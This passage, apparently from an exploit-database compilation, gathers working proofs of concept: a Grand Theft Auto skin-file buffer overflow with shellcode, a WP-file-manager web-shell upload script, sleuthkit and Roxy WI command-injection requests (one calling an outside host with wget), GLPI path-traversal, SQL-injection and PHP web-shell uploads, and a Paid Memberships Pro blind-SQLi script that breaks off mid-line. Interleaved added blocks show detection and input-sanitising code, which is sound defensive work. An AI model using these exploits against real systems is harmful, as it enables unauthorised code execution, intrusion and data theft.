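documents are constructed; the first reproduces the advisory's vector."""
import xml.etree.ElementTree as ET

# Elements that can run script or embed foreign content inside an SVG.
BLOCKED_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# Link attributes; after namespace stripping xlink:href is also just "href".
LINK_ATTRIBUTES = {"href"}
DANGEROUS_SCHEMES = ("javascript:", "data:")


def local_name(qualified: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list:
    """Return the reasons to reject the file; an empty list means none found.
    ElementTree keeps this stdlib-only; a production check should parse with
    defusedxml so entity-expansion and external-entity tricks are refused too."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if local_name(root.tag) != "svg":
        findings.append(f"root element is <{local_name(root.tag)}>, not <svg>")
    for element in root.iter():
        name = local_name(element.tag)
        if name in BLOCKED_ELEMENTS:
            findings.append(f"<{name}> element")
        for attribute, value in element.attrib.items():
            attr = local_name(attribute).lower()
            if attr.startswith("on"):
                findings.append(f"event handler attribute {attr} on <{name}>")
            elif attr in LINK_ATTRIBUTES and value.strip().lower().startswith(DANGEROUS_SCHEMES):
                findings.append(f"{attr} with {value.strip().split(':', 1)[0].lower()}: scheme on <{name}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


# The advisory's vector, reproduced as constructed test input.
ADVISORY_VECTOR = b"""<svg version="1.1" baseProfile="full" xmlns=" http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("haha XSS");
</script>
</svg>"""

BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><circle r="1"/></svg>'
LINK_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text>x</text></a></svg>')

if __name__ == "__main__":
    for label, doc in [("advisory", ADVISORY_VECTOR), ("benign", BENIGN_SVG),
                       ("onload", ONLOAD_SVG), ("link", LINK_SVG)]:
        print(label, svg_findings(doc))
```

Content inspection is one layer; the other is how the file is served. A profile picture that is delivered with `Content-Disposition: attachment`, or rendered only through an `<img>` tag rather than opened as a top-level document, does not execute script even if the check above is bypassed.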
-
Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow
```python
# Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow
# Exploit Date: 22.01.2023
# Discovered and Written by: Knursoft
# Vendor Homepage: https://www.rockstargames.com/
# Version: v1.1
# Tested on: Windows XP SP2/SP3, 7, 10 21H2
# CVE : N/A

#1 - Run this python script to generate the "evil.bmp" file.
#2 - Copy it to [Your Game Path]\skins.
#3 - Launch the game and navigate to Options > Player Setup and choose skin "evil".
#4 - Buffer overflow occurs and calc.exe pops up!

#msfvenom -p windows/exec CMD="calc.exe"
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"
buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65"
buf += b"\x00"
#any shellcode should work, as it seems there are no bad characters

ver = 0  #set to 1 if you want it to work on the GTA III Steam version
esp = b"\xb9\xc5\x14\x21"  #mss32.dll jmp esp
bmphdr = b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"  #generic bmp header

payload = bmphdr
payload += b"\x90" * 1026
if ver == 1:
    payload += b"\x90" * 112
payload += esp
payload += b"\x90" * 20  #padding
payload += buf

with open("evil.bmp", "wb") as poc:
    poc.write(payload)
```
-
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
```python
#!/usr/bin/env python3
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys, signal, time, requests
from bs4 import BeautifulSoup
#from pprint import pprint


def handler(sig, frame):
    print("[!]Saliendo")
    sys.exit(1)


signal.signal(signal.SIGINT, handler)


def commandexec(command):
    # The uploaded file is reached through the lib/php/../files/ path.
    exec_url = url + "/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {"cmd": command}
    r = requests.get(exec_url, params=params)
    soup = BeautifulSoup(r.text, 'html.parser')
    text = soup.get_text()
    print(text)


def exploit():
    global url
    url = sys.argv[1]
    command = sys.argv[2]
    upload_url = url + "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    headers = {
        'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
        'Connection': "close"
    }
    # Multipart body for the elFinder "upload" command, targeting the root ("l1_Lw").
    payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"
    try:
        r = requests.post(upload_url, data=payload, headers=headers)
        #pprint(r.json())
        commandexec(command)
    except Exception:
        print("[!] Algo ha salido mal...")


def help():
    print("\n[*] Uso: python3", sys.argv[0], "\"url\" \"comando\"")
    print("[!] Ejemplo: python3", sys.argv[0], "http://wordpress.local/ id")


if __name__ == '__main__':
    if len(sys.argv) != 3:
        help()
    else:
        exploit()
```
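The exploit leaves two distinctive traces in a web server's access log: a POST straight to the plugin's `connector.minimal.php`, and a later GET for a `.php` file under the plugin's `files` directory, reached here through `lib/php/../files/`. The block below is an added detection example, not the exploit author's code, run over constructed log lines; the path normalisation step matters because the `..` segment would otherwise hide the files directory from a naive prefix match. Whether legitimate administration traffic also reaches the connector directly depends on the plugin version, so treat the first rule as a lead to correlate rather than proof on its own.

```python
"""Added example (not the exploit author's code): detection logic for the
two request shapes this exploit produces, an upload POST to the plugin's
connector and a later GET that executes a PHP file under the plugin's files
directory, run over constructed web-server log lines."""
import posixpath
import re
from urllib.parse import urlsplit

# Combined-log-format request line: ip ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3})'
)

PLUGIN_ROOT = "/wp-content/plugins/wp-file-manager/"
CONNECTOR = PLUGIN_ROOT + "lib/php/connector.minimal.php"
FILES_DIR = PLUGIN_ROOT + "lib/files/"


def classify_request(method: str, target: str):
    """Return a rule name for a suspicious request, or None."""
    # normpath collapses lib/php/../files into lib/files; the query is dropped.
    path = posixpath.normpath(urlsplit(target).path)
    if path == CONNECTOR and method == "POST":
        return "connector-upload"
    if path.startswith(FILES_DIR) and path.lower().endswith(".php"):
        return "php-in-files-dir"
    return None


def scan_log(lines) -> list:
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if not match:
            continue
        rule = classify_request(match["method"], match["target"])
        if rule:
            findings.append({"line": number, "ip": match["ip"],
                             "rule": rule, "target": match["target"]})
    return findings


def sources_with_both(findings) -> list:
    """IPs that both posted to the connector and then requested a PHP file
    from the files directory: the sequence the exploit performs."""
    rules_by_ip = {}
    for finding in findings:
        rules_by_ip.setdefault(finding["ip"], set()).add(finding["rule"])
    wanted = {"connector-upload", "php-in-files-dir"}
    return sorted(ip for ip, rules in rules_by_ip.items() if wanted <= rules)


# Constructed log lines: one exploit sequence and two ordinary requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jan/2023:12:00:00 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 312 "-" "python-requests/2.28.1"',
    '203.0.113.7 - - [22/Jan/2023:12:00:01 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/../files/shell.php?cmd=id HTTP/1.1" 200 88 "-" "python-requests/2.28.1"',
    '198.51.100.4 - - [22/Jan/2023:12:05:00 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/logo.png HTTP/1.1" 200 4522 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Jan/2023:12:06:00 +0000] "GET /?p=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("sources completing the sequence:", sources_with_both(hits))
```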
-
sleuthkit 4.11.1 - Command Injection
# Exploit Title: sleuthkit 4.11.1 - Command Injection
# Date: 2023-01-20
# CVE-2022-45639
# Vendor Homepage: https://github.com/sleuthkit
# Vulnerability Type: Command injection
# Attack Type: Local
# Version: 4.11.1
# Exploit Author: Dino Barlattani, Giuseppe Granato
# Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639

# POC:
The fls tool is affected by command injection in the "-m" parameter when run on a Linux system. An OS command injection vulnerability in the sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value for the -m parameter when run on Linux: a user can pass the -m parameter a value containing a shell command enclosed in backticks. If the tool runs behind a web application as a front end, this can execute commands on the remote server.

The function affected by the vulnerability is "tsk_fs_fls()" in the "fls_lib.c" file:

```c
#ifdef TSK_WIN32
{
    ....
}
#else
    data.macpre = tpre;   <---------------
    return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data);
#endif
```

Run command:

```
$ fls -m `id` [Options]
```

--
*Dino Barlattani*
www.linkedin.com/in/dino-barlattani-10bba11a9/
www.binaryworld.it <http://Binaryworld.it>
www.youtube.com/user/dinbar78
-
Roxy WI v6.1.0.0 - Improper Authentication Control
# Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31125

# PoC

```http
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: https://192.168.56.114
Dnt: 1
Referer: https://192.168.56.114/app/login.py
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45
```
-
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31126

# PoC

```http
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;
```
-
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31161

# PoC

```http
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;
```
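The sleuthkit `-m` entry and the two Roxy-WI `getcert`/`delcert` entries above share one root cause: a request value ends up on a command line that a shell interprets, so `;id;`, backticks and `& wget ...` become commands. The block below is an added example, not code from sleuthkit, Roxy-WI or the advisory authors, showing how a front end should pass such values: an allow-list on the characters, an argv list, and no shell. The commands it builds are illustrative stand-ins (a plausible `fls -m` call and an assumed `openssl x509` call against an assumed certificate directory), not the real invocations of either project.

```python
"""Added example (not from any of the three advisories): pass user-supplied
values such as an fls -m prefix or a certificate name to a program through
an allow-list and an argv list, never a shell, so ;id;, backticks and
"& wget ..." arrive as literal text. Commands built here are illustrative."""
import re
import shlex
import subprocess
import sys

# A bare name: letters, digits, dot, underscore, dash; must not start with a
# dot, which also rules out '..'.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]*")
# A path made of such names joined by '/', optionally absolute or with a
# trailing slash. No spaces, quotes, ';', '&', '|', '$' or backticks.
SAFE_PATH = re.compile(r"/?(?:[A-Za-z0-9_][A-Za-z0-9._-]*/)*[A-Za-z0-9_][A-Za-z0-9._-]*/?")


def is_safe_name(value: str) -> bool:
    return SAFE_NAME.fullmatch(value) is not None


def is_safe_path(value: str) -> bool:
    return SAFE_PATH.fullmatch(value) is not None


def check(value: str, what: str, predicate) -> str:
    if not predicate(value):
        raise ValueError(f"{what} {value!r} contains characters that are not allowed")
    return value


def build_fls_argv(image_path: str, mount_prefix: str) -> list:
    """fls -m <prefix> <image>, the -m value being the one the sleuthkit
    advisory injects through. Both values are allow-listed first."""
    return ["fls", "-m", check(mount_prefix, "mount prefix", is_safe_path),
            check(image_path, "image path", is_safe_path)]


def build_cert_argv(cert_name: str, cert_dir: str = "/etc/app/certs") -> list:
    """Illustrative wrapper for a getcert/delcert-style parameter: the name
    is bound to a fixed directory and cannot carry shell syntax or '..'.
    The openssl call and cert_dir are assumptions for the example."""
    name = check(cert_name, "certificate name", is_safe_name)
    return ["openssl", "x509", "-noout", "-text", "-in", f"{cert_dir}/{name}"]


def run_argv(argv: list) -> str:
    """Execute without a shell: metacharacters inside argv are not interpreted."""
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


def demo_literal_passing(value: str) -> str:
    """Run a child Python that prints its first argument. With an argv list
    the value arrives verbatim, so "`id`" comes back as the text "`id`"."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", value]
    return run_argv(argv).rstrip("\n")


def loggable(argv: list) -> str:
    """If a command line must be rendered as one string (logging, ssh),
    quote each element rather than concatenating them."""
    return shlex.join(argv)


if __name__ == "__main__":
    print(build_fls_argv("/cases/disk.img", "/mnt/evidence/"))
    print(demo_literal_passing("`id`"))
    for bad in (";id;", "a & wget example.invalid", "`id`"):
        print(bad, "->", "name ok" if is_safe_name(bad) else "rejected")
```

The allow-list is the part that makes the wrapper safe against more than shell injection: `is_safe_name` also refuses `..` and `/`, so the certificate parameter cannot be turned into a path traversal even though it is placed inside a path.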
-
GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
# ADVISORY INFORMATION
# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
# Date of found: 11 Jun 2022
# Application: GLPI Manageentities < 4.0.2
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/manageentities
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34127

# PoC

```http
GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
-
GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
# ADVISORY INFORMATION
# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
# Date of found: 11 Jun 2022
# Application: GLPI Glpiinventory <= 1.0.1
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi-inventory-plugin
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31062

# PoC

```http
POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
-
GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date of found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125

# PoC

GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
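All three GLPI inclusion PoCs above pass a `file` parameter whose traversal mixes `/` and `\` separators, so a filter that only looks for the literal string `../` is bypassed. The following is an added example (not code from GLPI, the plugins or the advisory) of a server-side normaliser that treats both separators alike, undoes repeated percent-encoding, and refuses anything that climbs above the base directory; it generalises beyond the PoCs by also rejecting absolute, drive-letter and UNC paths. The base directory and the benign file names are assumptions.

```python
import urllib.parse

# Constructed inputs: the 'file' values from the three GLPI PoCs above (raw
# strings, so the doubled backslashes are kept exactly as sent in the requests).
GLPI_CRI_FILE = r"../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts"
GLPI_DEPLOY_FILE = r"../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts"


def normalize_relative_path(user_path, max_decode_rounds=3):
    """Canonicalise a user-supplied relative path into a list of segments.

    Rules: '\\' and '/' are both separators; percent-encoding is undone until
    the value stops changing (bounded, which catches '%252e%252e' double
    encoding); '.' and empty segments are dropped; '..' pops a segment and is
    rejected once there is nothing left to pop. Absolute, drive-letter and UNC
    paths are rejected outright. Raises ValueError on any rejection.
    """
    decoded = user_path
    for _ in range(max_decode_rounds):
        again = urllib.parse.unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:
        raise ValueError("NUL byte in path: %r" % user_path)
    # A Linux-side filter that only knows '/' would let '..\' through; unify first.
    unified = decoded.replace("\\", "/")
    if unified.startswith("/"):
        # '/etc/passwd', '\Windows\win.ini' and UNC '\\host\share\file' all land here.
        raise ValueError("absolute or UNC path rejected: %r" % user_path)
    if ":" in unified.split("/", 1)[0]:
        raise ValueError("drive-letter path rejected: %r" % user_path)
    segments = []
    for seg in unified.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                raise ValueError("path traversal escapes base: %r" % user_path)
            segments.pop()
            continue
        segments.append(seg)
    if not segments:
        raise ValueError("empty path: %r" % user_path)
    return segments


def resolve_under_base(base_dir, user_path):
    """Return the on-disk path for user_path, guaranteed to stay under base_dir."""
    return base_dir.rstrip("/") + "/" + "/".join(normalize_relative_path(user_path))


def is_safe(user_path):
    """Boolean wrapper for logging and tests."""
    try:
        normalize_relative_path(user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Assumed base directory and a benign name a plugin might legitimately serve.
    for candidate in (GLPI_CRI_FILE, GLPI_DEPLOY_FILE, "cra/2022/report.pdf"):
        print("%-5s %s" % (is_safe(candidate), candidate))
    print(resolve_under_base("/var/www/glpi/files", "cra/2022/report.pdf"))
```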
-
GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# ADVISORY INFORMATION
# Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# Date of found: 11 Jun 2022
# Application: GLPI >=10.0.0, < 10.0.3
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31056

# PoC

POST /front/change.form.php HTTP/1.1
Host: acme.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156
Content-Length: 4836
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg

-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="id"

0
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_glpi_csrf_token"

752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_actors"

{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}
-----------------------------190705055020145329172298897156--

If you manipulate the filename of a file uploaded to the system, the file is placed under /files/_tmp/. The HTTP GET request required to trigger the issue is as follows.

POST /ajax/fileupload.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841
Content-Length: 559
Origin: http://acme.com
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg

-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="name"

_uploader_filename
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="showfilesize"

1
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"
Content-Type: application/x-php

Output: <?php echo system($_GET['cmd']); ?>
-----------------------------102822935214007887302871396841--

# POC URL
http://192.168.56.113/files/_tmp/poc.php?cmd=
-
GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128

# PoC

POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close

<?php echo system($_GET["cmd"]); ?>
-
Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
#!/usr/bin/env python
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
# Exploit Author: r3nt0n
# CVE: CVE-2023-23488
# Date: 2023/01/24
# Vulnerability discovered by Joshua Martinelle
# Vendor Homepage: https://www.paidmembershipspro.com
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
# Version: < 2.9.8
# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
#
# Running this script against a WordPress instance with the Paid Memberships Pro plugin
# tells you if the target is vulnerable.
# As the SQL injection technique required to exploit it is time-based blind, instead of
# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
# to dump the whole database (probably very time-consuming) or specific chosen data like
# usernames and passwords.
#
# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress

import sys
import requests


def get_request(target_url, delay="1"):
    # Time-based blind payload: the request only takes <delay> seconds if the
    # injected SLEEP() is actually executed by the database.
    payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
    data = {'rest_route': '/pmpro/v1/order', 'code': payload}
    return requests.get(target_url, params=data).elapsed.total_seconds()


print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')

if len(sys.argv) != 2:
    print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
    print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
    sys.exit(1)

target_url = sys.argv[1]

try:
    print('[-] Testing if the target is vulnerable...')
    req = requests.get(target_url, timeout=15)
except:
    print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m', u'\033[0m'))
    sys.exit(2)

# A vulnerable target takes measurably longer for SLEEP(2) than for SLEEP(1).
if get_request(target_url, "1") >= get_request(target_url, "2"):
